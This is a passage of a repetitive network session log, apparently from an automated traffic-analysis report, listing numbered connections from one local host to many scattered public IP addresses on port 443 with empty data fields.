                                                        13943192.168.2.1455912186.101.129.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13944192.168.2.1447914167.143.254.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13945192.168.2.1446710203.155.134.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13946192.168.2.145999037.245.231.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13947192.168.2.1451738208.248.9.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13948192.168.2.1454608195.105.0.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13949192.168.2.1453612201.250.109.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13950192.168.2.1442886193.17.115.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13951192.168.2.1460686114.199.59.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13952192.168.2.143806485.254.31.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13953192.168.2.1436638180.171.25.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13954192.168.2.1441460187.214.203.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13955192.168.2.1456072186.188.145.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13956192.168.2.1446626150.248.138.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13957192.168.2.1438350105.239.6.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13958192.168.2.145256831.193.247.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13959192.168.2.145013674.82.116.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13960192.168.2.14391082.215.63.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13961192.168.2.145699279.120.239.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13962192.168.2.1438052144.38.80.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13963192.168.2.1458248216.13.138.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13964192.168.2.1458338175.255.73.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13965192.168.2.1449630143.11.91.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13966192.168.2.1455362122.122.64.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13967192.168.2.1435848189.37.95.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13968192.168.2.144712667.138.65.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13969192.168.2.1440786204.98.125.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13970192.168.2.143870857.132.68.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13971192.168.2.1440082113.0.250.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13972192.168.2.144857064.98.199.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13973192.168.2.143942813.121.36.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13974192.168.2.1449172138.160.193.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13975192.168.2.144047659.27.0.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13976192.168.2.143310254.226.106.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13977192.168.2.1458086110.5.132.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13978192.168.2.1447194132.213.153.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13979192.168.2.1450248185.4.107.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13980192.168.2.1459508207.11.41.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13981192.168.2.144673294.0.246.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13982192.168.2.143369283.220.29.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13983192.168.2.1434658108.228.237.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13984192.168.2.1439256190.112.199.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13985192.168.2.145083643.160.187.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13986192.168.2.1441866151.232.206.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13987192.168.2.14330162.95.204.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13988192.168.2.1448164162.219.203.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13989192.168.2.1459468213.132.164.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13990192.168.2.1435144180.170.99.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13991192.168.2.1433172114.83.168.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13992192.168.2.1441342157.132.0.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13993192.168.2.146019625.78.238.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13994192.168.2.1457908129.77.10.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13995192.168.2.1459288126.242.77.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13996192.168.2.1443424125.228.75.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13997192.168.2.1445590212.16.233.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13998192.168.2.1436172112.215.252.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13999192.168.2.144088843.185.234.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14000192.168.2.1435972134.151.165.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14001192.168.2.1435730122.142.117.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14002192.168.2.144186661.36.168.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14003192.168.2.14556161.17.218.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14004192.168.2.1433738107.68.66.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14005192.168.2.1438020144.196.91.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14006192.168.2.1444898212.147.34.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14007192.168.2.1437050166.35.54.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14008192.168.2.1433026175.80.175.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14009192.168.2.1442252107.214.83.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14010192.168.2.1436354186.176.122.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14011192.168.2.1446816105.33.88.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14012192.168.2.1441126195.251.71.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14013192.168.2.14553442.68.100.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14014192.168.2.1452850162.22.227.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14015192.168.2.144295676.232.125.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14016192.168.2.1435900159.119.237.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14017192.168.2.1454126141.147.96.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14018192.168.2.144246843.35.9.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14019192.168.2.1460984202.23.241.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14020192.168.2.145458281.161.108.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14021192.168.2.145913231.95.17.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14022192.168.2.143516086.104.67.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14023192.168.2.143840075.63.35.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14024192.168.2.1449248192.37.103.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14025192.168.2.143698443.93.88.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14026192.168.2.144912894.232.205.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14027192.168.2.145843687.231.242.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14028192.168.2.1443114121.95.7.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14029192.168.2.143594243.27.7.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14030192.168.2.146097081.128.169.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14031192.168.2.143473495.190.126.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14032192.168.2.1445682206.139.175.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14033192.168.2.145790096.129.108.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14034192.168.2.143567499.153.56.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14035192.168.2.1437196205.230.142.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14036192.168.2.1448796213.209.201.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14037192.168.2.144769897.18.183.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14038192.168.2.145156631.88.248.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14039192.168.2.1448348146.77.50.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14040192.168.2.1434126155.93.156.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14041192.168.2.1437276203.65.99.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14042192.168.2.1438532122.136.32.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14043192.168.2.1457956210.193.224.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14044192.168.2.1436258161.3.20.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14045192.168.2.1439304106.148.66.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14046192.168.2.144023213.71.44.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14047192.168.2.14469002.43.34.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14048192.168.2.144907475.10.99.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14049192.168.2.1458934135.95.63.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14050192.168.2.1443122193.112.171.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14051192.168.2.1459914136.239.154.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14052192.168.2.1433978113.0.70.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14053192.168.2.145391017.73.244.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14054192.168.2.144637461.170.3.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14055192.168.2.144427019.238.136.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14056192.168.2.1450978156.168.130.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14057192.168.2.1435040197.201.200.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14058192.168.2.1457682147.134.52.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14059192.168.2.145026264.190.164.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14060192.168.2.144636879.100.227.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14061192.168.2.1444842131.150.255.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14062192.168.2.1440928197.225.181.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14063192.168.2.145778047.222.199.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14064192.168.2.145738243.83.74.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14065192.168.2.1456794109.148.214.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14066192.168.2.143673825.119.132.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14067192.168.2.145443860.4.200.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14068192.168.2.145245457.255.89.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14069192.168.2.14572862.25.233.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14070192.168.2.144571036.43.103.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14071192.168.2.1451892133.243.90.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14072192.168.2.145351049.144.136.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14073192.168.2.145132614.116.63.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14074192.168.2.144267074.251.158.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14075192.168.2.143588688.102.152.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14076192.168.2.1437528194.148.2.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14077192.168.2.1434754173.69.229.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14078192.168.2.1454300223.113.48.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14079192.168.2.143397887.197.152.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14080192.168.2.145142642.210.21.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14081192.168.2.1446608174.129.163.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14082192.168.2.144888896.89.123.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14083192.168.2.145720819.207.105.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14084192.168.2.146067438.212.198.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14085192.168.2.1453354207.240.120.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14086192.168.2.1439192202.249.86.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14087192.168.2.1446452161.106.94.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14088192.168.2.145348298.146.187.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14089192.168.2.1432792152.199.105.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14090192.168.2.145495274.88.0.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14091192.168.2.14350822.25.159.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14092192.168.2.145116839.31.43.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14093192.168.2.1436938223.94.236.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14094192.168.2.145213061.220.72.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14095192.168.2.1458468187.216.25.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14096192.168.2.145983424.147.157.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14097192.168.2.1445548168.56.59.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14098192.168.2.144828852.127.207.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14099192.168.2.146080213.171.107.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14100192.168.2.144554663.222.23.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14101192.168.2.145254662.84.102.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14102192.168.2.143431838.198.152.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14103192.168.2.1438010169.30.157.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14104192.168.2.1446280125.76.90.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14105192.168.2.1454052131.251.93.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14106192.168.2.1455048116.54.9.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14107192.168.2.145441848.168.247.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14108192.168.2.143678849.153.82.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14109192.168.2.144404268.81.112.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14110192.168.2.144237066.194.233.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14111192.168.2.1439560208.20.40.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14112192.168.2.1438938209.191.184.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14113192.168.2.143771876.50.148.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14114192.168.2.1433362131.206.189.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14115192.168.2.1457784131.236.71.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14116192.168.2.1450874170.73.187.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14117192.168.2.1442460156.206.195.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14118192.168.2.1440996104.74.185.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14119192.168.2.144276286.153.185.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14120192.168.2.1454708206.160.21.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14121192.168.2.144313647.158.93.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14122192.168.2.145896064.221.14.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14123192.168.2.1445522189.78.212.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14124192.168.2.1443064141.77.62.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14125192.168.2.1443430144.196.155.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14126192.168.2.1435870160.182.174.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14127192.168.2.144802877.179.145.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14128192.168.2.1456032165.72.179.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14129192.168.2.1437722210.120.250.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14130192.168.2.1455790190.236.182.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14131192.168.2.145292431.30.219.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14132192.168.2.143411290.197.218.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14133192.168.2.1451688186.14.230.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14134192.168.2.145747894.168.36.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14135192.168.2.1436552153.140.65.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14136192.168.2.1437258106.163.1.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14137192.168.2.1433806144.211.100.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14138192.168.2.1460020198.195.139.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14139192.168.2.1437060120.38.243.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14140192.168.2.1436074221.21.205.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14141192.168.2.143604213.98.91.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14142192.168.2.1450392106.99.207.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14143192.168.2.1451758133.71.203.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14144192.168.2.144899062.248.238.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14145192.168.2.143416074.194.84.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14146192.168.2.1460152169.128.157.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14147192.168.2.145285077.204.196.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14148192.168.2.1452740115.165.181.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14149192.168.2.1434714128.30.176.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14150192.168.2.1448046149.127.164.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14151192.168.2.144274282.116.44.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14152192.168.2.1436194182.238.47.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14153192.168.2.144105043.0.98.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14154192.168.2.1454582128.171.229.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14155192.168.2.1460352198.92.202.232443
